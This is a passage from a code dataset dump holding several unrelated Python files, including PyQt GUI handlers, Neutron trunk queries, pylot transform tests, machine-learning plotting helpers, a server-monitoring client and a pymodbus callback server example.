0)\n        self.curWidget = None\n        self.curN = None\n        self.popMenu = None \n        self.tableWidget_input.setContextMenuPolicy(Qt.CustomContextMenu)\n        \n        # Initialize data and contents \n        self.UILogic() \n    \n    def setModel(self, tModel):\n        \"\"\"\n        Initialize this node's XML description document\n        \"\"\"\n        \n        # Apply the parameter configuration \n        #self.InitComboVar(tModel)\n        self.DatcomCARD.setModel(tModel) \n        self.UILogic()\n    \n    def getDoc(self):\n        \"\"\"\n        Flush the UI contents back into the model variable\n        \"\"\" \n        # Refresh from the UI\n        return self.DatcomCARD.getModel()\n    \n    def UILogic(self):\n        \"\"\"\n        Run the UI refresh logic\n        \"\"\" \n        self.DatcomCARD.UILogic()\n        # Logic for the other tables\n        \n    @pyqtSlot(int)\n    def on_comboBox_STYPE_currentIndexChanged(self, index):\n        \"\"\"\n        Slot documentation goes here.\n        \n        @param index DESCRIPTION\n        @type int\n        \"\"\"\n        self.UILogic()\n    \n    @pyqtSlot()\n    def on_NDELTA_editingFinished(self):\n        \"\"\"\n        Slot documentation goes here.\n        \"\"\"\n        self.UILogic()\n    \n    @pyqtSlot(QPoint)\n    def on_tableWidget_input_customContextMenuRequested(self, pos):\n        \"\"\"\n        Slot documentation goes here.\n        \n        @param pos DESCRIPTION\n        @type QPoint\n        \"\"\"\n        self.curPos = pos\n        self.curWidget = self.tableWidget_input \n        posG = self.curWidget.mapToGlobal(pos)\n
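        # Build the context menu on demand, anchored at the cell under the cursor.\n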
        self.popMenu = QMenu(self.curWidget)\n        self.popMenu.addAction(self.actionAddRow)\n        self.popMenu.addAction(self.actionDeleteRow)\n        self.curWidget.setContextMenuPolicy(Qt.CustomContextMenu)\n        self.curN = self.NDELTA\n        \n        self.popMenu.exec(posG)\n        \n    @pyqtSlot()\n    def on_actionAddRow_triggered(self):\n        \"\"\"\n        Slot documentation goes here.\n        \"\"\"\n        \n        # Add a row\n        aItem = self.curWidget.indexAt(self.curPos) # assumed to be a table widget, otherwise this raises\n        rowIndex = 0\n        if aItem.row() == -1 :\n            # no row was hit\n            rowIndex = self.curWidget.rowCount()\n        else:\n            rowIndex = aItem.row()\n        \n        tLimit = 9 \n        if self.curWidget.rowCount() < tLimit:\n            self.curWidget.insertRow(rowIndex)\n        else:\n            self.logger.info(\"%s has reached the maximum row count; cannot add another row\"%self.curWidget.objectName())\n        if self.curN is not None: \n            self.curN.setText(str(self.curWidget.rowCount()))\n        \n        self.UILogic() \n        \n    @pyqtSlot()\n    def on_actionDeleteRow_triggered(self):\n        \"\"\"\n        Slot documentation goes here.\n        \"\"\"\n        \n        aItem = self.curWidget.indexAt(self.curPos)\n        if aItem.row() >= 0 : \n            self.curWidget.removeRow(aItem.row())\n        else:\n            self.logger.info(\"no row was hit\")\n        \n        if self.curN is not None:\n            self.curN.setText(str(self.curWidget.rowCount()))\n        \n        self.UILogic() \n","sub_path":"PyDatcomLab/GUIs/PlaneConfiguration/ASYFLP.py","file_name":"ASYFLP.py","file_ext":"py","file_size_in_byte":8343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"70213303","text":"\n\n# class header\nclass _DIORAMA():\n\tdef __init__(self,): \n\t\tself.name = \"DIORAMA\"\n\t\tself.definitions = [u'a model that shows a situation, such as a historical event or animals in their natural environment, in a way that looks real: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_diorama.py","file_name":"_diorama.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"573253121","text":"# Copyright 2017 Nokia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron.db import models_v2\nfrom neutron.db import segments_db\nfrom neutron.services.trunk import constants as t_consts\nfrom neutron.services.trunk import models\n\nfrom sqlalchemy.orm import aliased\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy.orm import noload\n\n\ndef get_vlan_subports_of_trunk_physnet(session, trunk_id):\n cur_trunk = aliased(models.Trunk, name='cur_trunk')\n cur_parent_port = aliased(models_v2.Port, name='cur_parent_port')\n cur_parent_network = aliased(models_v2.Network, name='cur_parent_network')\n cur_parent_network_segment = aliased(segments_db.NetworkSegment,\n name='cur_parent_network_segment')\n other_parent_port = aliased(models_v2.Port, name='other_parent_port')\n\n return (\n session.query(models_v2.Port)\n .options(\n noload('*'),\n joinedload(models_v2.Port.sub_port),\n joinedload(models_v2.Port.fixed_ips))\n .join(\n (models.SubPort, models.SubPort.port_id == models_v2.Port.id),\n (models.Trunk, models.SubPort.trunk_id == models.Trunk.id),\n (other_parent_port, other_parent_port.id == models.Trunk.port_id),\n (models_v2.Network,\n models_v2.Network.id == other_parent_port.network_id),\n (segments_db.NetworkSegment,\n segments_db.NetworkSegment.network_id == models_v2.Network.id),\n (cur_parent_network_segment,\n cur_parent_network_segment.physical_network ==\n segments_db.NetworkSegment.physical_network),\n (cur_parent_network,\n cur_parent_network.id == cur_parent_network_segment.network_id),\n (cur_parent_port, cur_parent_port.network_id ==\n cur_parent_network.id),\n (cur_trunk, cur_parent_port.id == cur_trunk.port_id),\n )\n .filter(\n cur_trunk.id == trunk_id,\n models.SubPort.segmentation_type == t_consts.VLAN)\n ).all()\n\n\ndef get_vlan_subports_of_trunk(session, trunk_id):\n return (\n session.query(models_v2.Port)\n .options(\n noload('*'),\n joinedload(models_v2.Port.sub_port),\n joinedload(models_v2.Port.fixed_ips))\n .join(\n (models.SubPort, models.SubPort.port_id == models_v2.Port.id),\n (models.Trunk, models.SubPort.trunk_id == models.Trunk.id)\n )\n .filter(\n models.Trunk.id == trunk_id,\n models.SubPort.segmentation_type == t_consts.VLAN)\n ).all()\n","sub_path":"nuage_neutron/plugins/common/trunk_db.py","file_name":"trunk_db.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"387395071","text":"import pytest\n\nfrom collections import namedtuple\nimport numpy as np\n\nimport carla\nfrom pylot.utils import Location, Rotation, Transform, Vector2D\nfrom pylot.perception.depth_frame import DepthFrame\nfrom pylot.perception.point_cloud import PointCloud\nfrom pylot.simulation.sensor_setup import CameraSetup\n\n## Location Tests\n\n\ndef test_empty_location():\n \"\"\" Test that an empty Location is initializes at (0, 0, 0) \"\"\"\n empty_location = Location()\n assert np.isclose(empty_location.x, 0), \"X value is not zero\"\n assert np.isclose(empty_location.y, 0), \"Y value is not zero\"\n assert np.isclose(empty_location.z, 0), \"Z value is not zero\"\n\n\n@pytest.mark.parametrize(\"x, y, z\", [(10, 20, 30), (-10, -20, -30)])\ndef test_location_creation(x, y, z):\n \"\"\" Test that the Location is initialized correctly. 
\"\"\"\n location = Location(x, y, z)\n assert np.isclose(location.x, x), \"X values are not the same.\"\n assert np.isclose(location.y, y), \"Y values are not the same.\"\n assert np.isclose(location.z, z), \"Z values are not the same.\"\n\n\n@pytest.mark.parametrize(\"x, y, z\", [(10, 20, 30), (-10, -20, -30)])\ndef test_location_from_carla(x, y, z):\n \"\"\" Test that the Location is initialized correctly from a carla.Location\n instance \"\"\"\n location = Location.from_carla_location(carla.Location(x, y, z))\n assert np.isclose(location.x, x), \"X values are not the same.\"\n assert np.isclose(location.y, y), \"Y values are not the same.\"\n assert np.isclose(location.z, z), \"Z values are not the same.\"\n\n\ndef test_negative_location_from_carla():\n \"\"\" Test that Location throws a ValueError if incorrect carla_loc argument\n is passed. \"\"\"\n DummyType = namedtuple(\"DummyType\", \"x, y, z\")\n dummy_instance = DummyType(10, 20, 30)\n with pytest.raises(ValueError):\n Location.from_carla_location(dummy_instance)\n\n\n@pytest.mark.parametrize(\"point_a, point_b, expected\",\n [((1, 2, 3), (1, 2, 3), 0),\n ((10, 20, 30), (40, 50, 60), 51.961524227)])\ndef test_distance(point_a, point_b, expected):\n \"\"\" Test the distance computed between two points is the same as expected\"\"\"\n location_a, location_b = Location(*point_a), Location(*point_b)\n assert np.isclose(location_a.distance(location_b), expected), \"Distance \"\n \"between point_a and point_b is not the same as the expected distance.\"\n assert np.isclose(location_b.distance(location_a), expected), \"Distance \"\n \"between point_b and point_a is not the same as the expected distance.\"\n\n\ndef test_as_carla_location():\n \"\"\" Test the as_carla_location instance method of Location \"\"\"\n location = Location(x=1, y=2, z=3)\n carla_location = location.as_carla_location()\n assert isinstance(carla_location, carla.Location), \"Returned instance is \"\n \"not of the type carla.Location\"\n assert np.isclose(carla_location.x, location.x), \"Returned instance x \"\n \"value is not the same as the one in location.\"\n assert np.isclose(carla_location.y, location.y), \"Returned instance y \"\n \"value is not the same as the one in location.\"\n assert np.isclose(carla_location.z, location.z), \"Returned instance z \"\n \"value is not the same as the one in location.\"\n\n\ndef test_as_numpy_array():\n \"\"\" Test the as_carla_location instance method of Location \"\"\"\n location = Location(x=1, y=2, z=3)\n np_array = location.as_numpy_array()\n assert isinstance(np_array, np.ndarray), \"Returned instance is \"\n \"not of the type np.ndarray\"\n assert all(np.isclose(np_array, [1, 2, 3])), \"Returned instance x, y, z \"\n \"values are not the same as the one in location.\"\n\n\n@pytest.mark.parametrize(\"point_a, point_b, expected\", [\n ((1, 2, 3), (1, 2, 3), (2, 4, 6)),\n ((1, 2, 3), (-1, -2, -3), (0, 0, 0)),\n])\ndef test_addition(point_a, point_b, expected):\n \"\"\" Test the addition of the two locations. 
\"\"\"\n location_a, location_b = Location(*point_a), Location(*point_b)\n sum_location = location_a + location_b\n assert isinstance(sum_location, Location), \"The sum was not of the type \"\n \"Location\"\n assert np.isclose(expected[0], sum_location.x), \"The x value of the sum \"\n \"was not the same as the expected value.\"\n assert np.isclose(expected[1], sum_location.y), \"The y value of the sum \"\n \"was not the same as the expected value.\"\n assert np.isclose(expected[2], sum_location.z), \"The z value of the sum \"\n \"was not the same as the expected value.\"\n\n\n@pytest.mark.parametrize(\"point_a, point_b, expected\", [\n ((1, 2, 3), (1, 2, 3), (0, 0, 0)),\n ((1, 2, 3), (-1, -2, -3), (2, 4, 6)),\n])\ndef test_subtraction(point_a, point_b, expected):\n \"\"\" Test the addition of the two locations. \"\"\"\n location_a, location_b = Location(*point_a), Location(*point_b)\n diff_location = location_a - location_b\n assert isinstance(diff_location, Location), \"The sum was not of the type \"\n \"Location\"\n assert np.isclose(expected[0], diff_location.x), \"The x value of the sum \"\n \"was not the same as the expected value.\"\n assert np.isclose(expected[1], diff_location.y), \"The y value of the sum \"\n \"was not the same as the expected value.\"\n assert np.isclose(expected[2], diff_location.z), \"The z value of the sum \"\n \"was not the same as the expected value.\"\n\n\n# TODO (Sukrit):: Write tests for to_camera_view after the CameraSetup tests.\n\n## Rotation Tests\n\n\ndef test_empty_rotation():\n \"\"\" Test that an empty Location is initializes at (0, 0, 0) \"\"\"\n empty_rotation = Rotation()\n assert np.isclose(empty_rotation.pitch, 0), \"pitch value is not zero\"\n assert np.isclose(empty_rotation.yaw, 0), \"yaw value is not zero\"\n assert np.isclose(empty_rotation.roll, 0), \"roll value is not zero\"\n\n\n@pytest.mark.parametrize(\"pitch, yaw, roll\", [(90, 90, 90), (0, 0, 0)])\ndef test_rotation(pitch, yaw, roll):\n \"\"\" Test the creation of Rotation from pitch, yaw, roll. \"\"\"\n rotation = Rotation(pitch, yaw, roll)\n assert np.isclose(rotation.pitch, pitch), \"The pitch was not the same.\"\n assert np.isclose(rotation.yaw, yaw), \"The yaw was not the same.\"\n assert np.isclose(rotation.roll, roll), \"The roll was not the same.\"\n\n\n@pytest.mark.parametrize(\"pitch, yaw, roll\", [(90, 90, 90), (0, 0, 0)])\ndef test_rotation_from_carla(pitch, yaw, roll):\n \"\"\" Test that the Rotation is initialized correctly from a carla.Rotation\n instance \"\"\"\n carla_rotation = carla.Rotation(pitch, yaw, roll)\n rotation = Rotation.from_carla_rotation(carla_rotation)\n assert np.isclose(rotation.pitch, pitch), \"pitch values are not the same.\"\n assert np.isclose(rotation.yaw, yaw), \"yaw values are not the same.\"\n assert np.isclose(rotation.roll, roll), \"roll values are not the same.\"\n\n\ndef test_negative_rotation_from_carla():\n \"\"\" Test that Rotation throws a ValueError if incorrect carla_rot argument\n is passed. 
\"\"\"\n DummyType = namedtuple(\"DummyType\", \"pitch, yaw, roll\")\n dummy_instance = DummyType(10, 20, 30)\n with pytest.raises(ValueError):\n Rotation.from_carla_rotation(dummy_instance)\n\n\ndef test_as_carla_rotation():\n \"\"\" Test the as_carla_rotation instance method of Rotation \"\"\"\n rotation = Rotation(pitch=1, yaw=2, roll=3)\n carla_rotation = rotation.as_carla_rotation()\n assert isinstance(carla_rotation, carla.Rotation), \"Returned instance is \"\n \"not of the type carla.Rotation\"\n assert np.isclose(carla_rotation.pitch, rotation.pitch), \"Returned \"\n \"instance pitch value is not the same as the one in rotation.\"\n assert np.isclose(carla_rotation.yaw, rotation.yaw), \"Returned instance \"\n \"yaw value is not the same as the one in rotation.\"\n assert np.isclose(carla_rotation.roll, rotation.roll), \"Returned instance \"\n \"roll value is not the same as the one in location.\"\n\n## Depth Frame Tests\n\n@pytest.mark.parametrize(\"x, y, z, threshold, expected\", [\n (1, 0, 150, 100, True),\n (1, 0, 150, 25, False),\n (2, 1, 300, 250, True),\n (2, 1, 300, 150, False)\n])\ndef test_pixel_has_same_depth(x, y, z, threshold, expected):\n \"\"\"Tests if the pixel at (x,y) has a depth within the specified\n threshold of z.\"\"\"\n camera_setup = None\n depth_frame = DepthFrame([[0, 0.1, 0],\n [0, 0, 0.5]],\n camera_setup)\n assert depth_frame.pixel_has_same_depth(x, y, z, threshold) is expected, \\\n \"Depth thresholding did not work correctly.\"\n\n\n@pytest.mark.parametrize(\"depth_frame, expected\", [\n (np.array([[0.4, 0.3], [0.2, 0.1]]), \\\n [Location(400, -400, 400), Location(300, 300, 300), \\\n Location(200, -200, -200), Location(100, 100, -100)]),\n (np.array([[0.1, 0.2]]), [Location(100, -100, 0), Location(200, 200, 0)]),\n (0.01 * np.ones((3,3)), \\\n [Location(10, -10, 10), Location(10, 0, 10), Location(10, 10, 10),\n Location(10, -10, 0), Location(10, 0, 0), Location(10, 10, 0),\n Location(10, -10, -10), Location(10, 0, -10), Location(10, 10, -10)])\n])\ndef test_depth_to_point_cloud(depth_frame, expected):\n height, width = depth_frame.shape\n camera_setup = CameraSetup('test_setup', 'test_type',\n width, height,\n Transform(location=Location(0, 0, 0),\n rotation=Rotation(0, 0, 0)),\n fov=90)\n depth_frame = DepthFrame(depth_frame, camera_setup)\n # Resulting unreal coordinates.\n point_cloud = depth_frame.as_point_cloud()\n for i in range(width * height):\n assert np.isclose(point_cloud[i].x, expected[i].x), 'Returned x '\n 'value is not the same as expected'\n assert np.isclose(point_cloud[i].y, expected[i].y), 'Returned y '\n 'value is not the same as expected'\n assert np.isclose(point_cloud[i].z, expected[i].z), 'Returned z '\n 'value is not the same as expected'\n\n\n@pytest.mark.parametrize(\"depth_frame, expected\", [\n (np.array([[0.1, 0.1]]), [Location(110, -80, 30), Location(110, 120, 30)])\n])\ndef test_depth_to_point_cloud_nonzero_camera_loc(depth_frame, expected):\n height, width = depth_frame.shape\n camera_setup = CameraSetup('test_setup', 'test_type',\n width, height,\n Transform(location=Location(10, 20, 30),\n rotation=Rotation(0, 0, 0)),\n fov=90)\n depth_frame = DepthFrame(depth_frame, camera_setup)\n # Resulting unreal coordinates.\n point_cloud = depth_frame.as_point_cloud()\n print (point_cloud)\n for i in range(width * height):\n assert np.isclose(point_cloud[i].x, expected[i].x), 'Returned x '\n 'value is not the same as expected'\n assert np.isclose(point_cloud[i].y, expected[i].y), 'Returned y '\n 'value is not the same as 
expected'\n assert np.isclose(point_cloud[i].z, expected[i].z), 'Returned z '\n 'value is not the same as expected'\n\n\n@pytest.mark.parametrize(\"depth_frame, pixels, expected\", [\n (np.array([[0.4, 0.3], [0.2, 0.1]]), \\\n [Vector2D(0,1), Vector2D(1,0)], \\\n [Location(200, -200, -200), Location(300, 300, 300)])\n])\ndef test_get_pixel_locations(depth_frame, pixels, expected):\n height, width = depth_frame.shape\n camera_setup = CameraSetup('test_setup', 'test_type',\n width, height,\n Transform(location=Location(0, 0, 0),\n rotation=Rotation(0, 0, 0)),\n fov=90)\n depth_frame = DepthFrame(depth_frame, camera_setup)\n locations = depth_frame.get_pixel_locations(pixels)\n for i in range(len(pixels)):\n assert np.isclose(locations[i].x, expected[i].x), 'Returned x '\n 'value is not the same as expected'\n assert np.isclose(locations[i].y, expected[i].y), 'Returned y '\n 'value is not the same as expected'\n assert np.isclose(locations[i].z, expected[i].z), 'Returned z '\n 'value is not the same as expected'\n\n\n## Point Cloud Tests\n\n@pytest.mark.parametrize(\"points, expected\", [\n ([Location(1,0,0), Location(0,1,0), Location(0,0,1), Location(1,2,3)],\n [[1,0,0],[0,0,-1],[0,1,0],[1,3,-2]])\n])\ndef test_initialize_point_cloud(points, expected):\n point_cloud = PointCloud(points, Transform(Location(), Rotation()))\n for i in range(len(expected)):\n assert all(np.isclose(point_cloud.points[i], expected[i]))\n\n\n@pytest.mark.parametrize(\"lidar_points, pixel, expected\", [\n\n # In this test, lidar points are first converted to camera coordinates,\n # when constructing the PointCloud. Then, get_pixel_location finds the\n # closest point in the point cloud, normalizes our query to have the\n # same depth as this closest point, and converts to unreal coordinates.\n #\n # For example, in the first test case, the lidar points in camera coordinates\n # are (-1,0,1),(1,0,1), and the query pixel is (-0.5, 0, 1). The closest lidar\n # point is (-1,0,1), so the normalization step has no effect. 
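(In the third case below, the closest camera-frame point is (-2,0,2), so the\n    # query ray (-0.5,0,1) is scaled by depth 2 to (-1,0,2), which converts to\n    # unreal coordinates (2,-1,0).) 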
Finally,\n # converting the query pixel to unreal coordinates gives (1, -0.5, 0).\n\n # Lidar Points are left middle and right middle, same depth.\n ([Location(-1,-1,0),Location(1,-1,0)], Vector2D(200, 300), Location(1, -0.5, 0)),\n ([Location(-1,-1,0),Location(1,-1,0)], Vector2D(600, 300), Location(1, 0.5, 0)),\n # Lidar points are left middle and right middle, different depth.\n ([Location(-2,-2,0),Location(1,-1,0)], Vector2D(200, 300), Location(2, -1, 0)),\n ([Location(-2,-2,0),Location(1,-1,0)], Vector2D(600, 300), Location(1, 0.5, 0)),\n # Lidar points are top left and bottom right, same depth.\n ([Location(-2,-2,-1.5),Location(2,-2,1.5)], Vector2D(200, 150), Location(2,-1,0.75)),\n])\ndef test_point_cloud_get_pixel_location(lidar_points, pixel, expected):\n camera_setup = CameraSetup('test_setup', 'test_type',\n 801, 601, # width, height\n Transform(location=Location(0,0,0),\n rotation=Rotation(0,0,0)),\n fov=90)\n point_cloud = PointCloud(lidar_points, Transform(Location(), Rotation()))\n location = point_cloud.get_pixel_location(pixel, camera_setup)\n assert np.isclose(location.x, expected.x), 'Returned x value is not the same '\n 'as expected'\n assert np.isclose(location.y, expected.y), 'Returned y value is not the same '\n 'as expected'\n assert np.isclose(location.z, expected.z), 'Returned z value is not the same '\n 'as expected'\n","sub_path":"tests/test_transforms.py","file_name":"test_transforms.py","file_ext":"py","file_size_in_byte":14589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"134147359","text":"# -*- coding: utf-8 -*-\n######################################################################\n## A parte de las funciones aquí implementadas, necesitareis ##\n## np.random.uniform(rango[0], rango[1], size=(N, dim0, dim1, ...)) ## \n## que se corresponde con simula_unif(N, dim, rango) ## \n######################################################################\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# Función que devuelve un vector de forma con valores aleatorios \n# extraídos de una normal de media y varianza .\n# Se corresponde con simula_gaus(N, dim, sigma), en caso de llamarla\n# con simula_gaus((N, dim0, dim1, ...), sigma).\ndef simula_gaus(size, sigma, media=None):\n media = 0 if media is None else media\n \n if len(size) > 2:\n N = size[0]\n size_sub = size[1:]\n \n out = np.zeros(size, np.float64)\n \n for i in range(N):\n out[i] = np.random.normal(loc=mean, scale=sigma, size=size_sub)\n \n else:\n out = np.random.normal(loc=mean, scale=sigma, size=size)\n \n return out\n\n\n# Función que devuelve los parámetros a y b de una recta aleatoria,\n# y = a*x + b, tal que dicha recta corta al cuadrado definido por \n# por los puntos (intervalo[0], intervalo[0]) y \n# (intervalo[1], intervalo[1]).\ndef simula_recta(intervalo=(-1,1), ptos = None):\n if ptos is None: \n m = np.random.uniform(intervalo[0], intervalo[1], size=(2, 2))\n \n a = (m[0,1]-m[1,1])/(m[0,0]-m[1,0]) # Calculo de la pendiente.\n b = m[0,1] - a*m[0,0] # Calculo del termino independiente.\n \n return a, b\n\n'''\n Transforma los parámetros de una recta 2d a los coeficientes de w.\n a: Pendiente de la recta.\n b: Término independiente de la recta.\n'''\ndef line2coef(a, b):\n w = np.zeros(3, np.float64)\n #w[0] = a/(1-a-b)\n #w[2] = (b-b*w[0])/(b-1)\n #w[1] = 1 - w[0] - w[2]\n \n #Suponemos que w[1] = 1\n w[0] = a\n w[1] = 1.0\n w[2] = b\n \n return w\n\n\n'''\n Pinta los datos con su etiqueta y la recta definida por a y b.\n X: 
Datos (Intensidad promedio, Simetría).\n y: Etiquetas (-1, 1).\n a: Pendiente de la recta.\n b: Término independiente de la recta.\n'''\ndef plot_datos_recta(X, y, a, b, title='Point clod plot', xaxis='x axis', yaxis='y axis'):\n #Preparar datos\n w = line2coef(a, b)\n min_xy = X.min(axis=0)\n max_xy = X.max(axis=0)\n border_xy = (max_xy-min_xy)*0.01\n \n #Generar grid de predicciones\n xx, yy = np.mgrid[min_xy[0]-border_xy[0]:max_xy[0]+border_xy[0]+0.001:border_xy[0], \n min_xy[1]-border_xy[1]:max_xy[1]+border_xy[1]+0.001:border_xy[1]]\n grid = np.c_[xx.ravel(), yy.ravel(), np.ones_like(xx).ravel()]\n pred_y = grid.dot(w)\n pred_y = np.clip(pred_y, -1, 1).reshape(xx.shape)\n \n #Plot\n f, ax = plt.subplots(figsize=(8, 6))\n contour = ax.contourf(xx, yy, pred_y, 50, cmap='RdBu',\n vmin=-1, vmax=1)\n ax_c = f.colorbar(contour)\n ax_c.set_label('$w^tx$')\n ax_c.set_ticks([-1, -0.75, -0.5, -0.25, 0, 0.25, 0.5, 0.75, 1])\n ax.scatter(X[:, 0], X[:, 1], c=y, s=50, linewidth=2, \n cmap=\"RdYlBu\", edgecolor='white', label='Datos')\n ax.plot(grid[:, 0], -a*grid[:, 0]-b, 'black', linewidth=2.0, label='Solucion')\n ax.set(\n xlim=(min_xy[0]-border_xy[0], max_xy[0]+border_xy[0]), \n ylim=(min_xy[1]-border_xy[1], max_xy[1]+border_xy[1]),\n xlabel=xaxis, ylabel=yaxis)\n ax.legend()\n plt.title(title)\n plt.show()\n\n \n","sub_path":"Practicas/practica2/Funciones_necesarias_p2.py","file_name":"Funciones_necesarias_p2.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"32481391","text":"import time, threading, json\nimport requests\nfrom conf import settings\nfrom plugins import plugin_api\n\n\nclass ClientHandlers(object):\n\n def __init__(self):\n self.monitor_services = {}\n\n\n def load_latest_config(self):\n \"\"\"\n 加载最新的配置信息\n :return:\n \"\"\"\n request_type = settings.configs[\"urls\"][\"get_configs\"][1]\n request_url = \"%s/%s\" % (settings.configs[\"urls\"][\"get_configs\"][0], settings.configs[\"HostIP\"])\n lastest_config = self.url_request(request_type, request_url)\n self.monitor_services.update(lastest_config)\n\n\n def forever_run(self):\n exit_flag = False\n config_lastest_update_time = 0\n while not exit_flag:\n if time.time() - config_lastest_update_time > settings.configs[\"ConfigUpdateInterval\"]:\n self.load_latest_config()\n print(\"Lastest_config:\", self.monitor_services)\n config_lastest_update_time = time.time()\n\n for service_name, val in self.monitor_services[\"services\"].items():\n if len(val) == 2:\n self.monitor_services[\"services\"][service_name].append(0)\n monitor_interval = val[1]\n last_invoke_time = val[2]\n if time.time() - last_invoke_time > monitor_interval:\n print(\"---->\", last_invoke_time, \"---->\", time.time())\n self.monitor_services[\"services\"][service_name][2] = time.time()\n t = threading.Thread(target=self.invoke_plugin, args=(service_name, val))\n t.start()\n print(\"start monitor service: [{ServiceName}]\".format(ServiceName=service_name))\n else:\n print(\"Going to monitor service [{ServiceName}] in [{interval}] secs\".format(ServiceName=service_name, interval=monitor_interval - (time.time() - last_invoke_time)))\n time.sleep(1)\n\n\n def invoke_plugin(self, service_name, val):\n plugin_name = val[0]\n if hasattr(plugin_api, plugin_name):\n func = getattr(plugin_api, plugin_name)\n plugin_callback = func()\n print(plugin_callback)\n\n report_data = {\n \"client_ip\": settings.configs['HostIP'],\n \"service_name\": service_name,\n \"data\": 
json.dumps(plugin_callback),\n }\n\n request_action = settings.configs[\"urls\"][\"service_report\"][1]\n request_url = settings.configs[\"urls\"][\"service_report\"][0]\n self.url_request(request_action, request_url, params=report_data)\n else:\n print(\"\\033[31mCannot find service [%s]' plugin name [%s] in plugin_api\\033[0m\" % (service_name, plugin_name))\n print('--plugin:', val)\n\n\n def url_request(self, action, request_url, **extra_data):\n abs_url = \"http://{ip_addr}:{port}/{url}\".format(ip_addr=settings.configs[\"Server\"],\n port=settings.configs[\"ServerPort\"],\n url=request_url)\n print(\"\\033[31m{abs_url}\\033[0m\".format(abs_url=abs_url), type(extra_data), extra_data)\n print(extra_data)\n if action in ('get', \"GET\"):\n print(abs_url, extra_data)\n try:\n r = requests.get(abs_url, timeout=settings.configs[\"RequestTimeout\"])\n r_data = r.json()\n return r_data\n except requests.RequestException as E:\n exit(\"\\033[31;1m%s\\033[0m\" % E)\n\n elif action in ('post', 'POST'):\n try:\n data = json.dumps(extra_data['params'])\n req = requests.post(url=abs_url, data=extra_data[\"params\"])\n res_data = req.json()\n print(\"------------------------------------------------------\")\n print(\"\\033[31;1m[%s]:[%s]\\033[0m response:\\n%s,%s\" % (action, abs_url, res_data, data))\n print(\"------------------------------------------------------\")\n return res_data\n except Exception as e:\n print('-----exce', e)\n print(\"\\033[31m;1m%s\\033[0m\" % e)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"monitoring_control/monitor_client/core/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"364869703","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 1 13:53:42 2018\n\n@author: admin\n\"\"\"\n\nimport os\nimport cv2\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\ndef read_image(img_name):\n img=cv2.imread(img_name)\n img=cv2.cvtColor(img,cv2.COLOR_RGB2GRAY) #转换为灰度图像\n data=np.array(img)\n return data\n\nimages=[]\nfor fn in os.listdir('./images'):\n if fn.endswith('.png'):\n fd=os.path.join('./images',fn)\n images.append(read_image(fd))\n print('load success!')\n X=np.array(images)\n print(X.shape)\n ","sub_path":"chapter-5/load_img.py","file_name":"load_img.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"242826204","text":"#!/usr/bin/env python3\n# pylint: disable=missing-type-doc,missing-param-doc,differing-param-doc\n\"\"\"Pymodbus Server With Callbacks.\n\nThis is an example of adding callbacks to a running modbus server\nwhen a value is written to it. 
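Each write lands in CallbackDataBlock.setValues, which stores the new value and pushes a (device, value) message onto a queue consumed by the device_writer thread. 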
In order for this to work, it needs\na device-mapping file.\n\"\"\"\nimport logging\nfrom multiprocessing import Queue\nfrom threading import Thread\n\n# --------------------------------------------------------------------------- #\n# import the modbus libraries we need\n# --------------------------------------------------------------------------- #\nfrom pymodbus import __version__ as pymodbus_version\nfrom pymodbus.datastore import (\n ModbusServerContext,\n ModbusSlaveContext,\n ModbusSparseDataBlock,\n)\nfrom pymodbus.device import ModbusDeviceIdentification\nfrom pymodbus.server import StartTcpServer\n\n\n# from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer\n\n\n# --------------------------------------------------------------------------- #\n# configure the service logging\n# --------------------------------------------------------------------------- #\nlog = logging.getLogger()\nlog.setLevel(logging.DEBUG)\n\n# --------------------------------------------------------------------------- #\n# create your custom data block with callbacks\n# --------------------------------------------------------------------------- #\n\n\nclass CallbackDataBlock(ModbusSparseDataBlock):\n \"\"\"A datablock that stores the new value in memory,\n\n and passes the operation to a message queue for further processing.\n \"\"\"\n\n def __init__(self, devices, queue):\n \"\"\"Initialize.\"\"\"\n self.devices = devices\n self.queue = queue\n\n values = {k: 0 for k in devices.keys()}\n values[0xBEEF] = len(values) # the number of devices\n super().__init__(values)\n\n def setValues(self, address, value): # pylint: disable=arguments-differ\n \"\"\"Set the requested values of the datastore\n\n :param address: The starting address\n :param values: The new values to be set\n \"\"\"\n super().setValues(address, value)\n self.queue.put((self.devices.get(address, None), value))\n\n\n# --------------------------------------------------------------------------- #\n# define your callback process\n# --------------------------------------------------------------------------- #\n\n\ndef rescale_value(value):\n \"\"\"Rescale the input value from the range of 0..100 to -3200..3200.\n\n :param value: The input value to scale\n :returns: The rescaled value\n \"\"\"\n scale = 1 if value >= 50 else -1\n cur = value if value < 50 else (value - 50)\n return scale * 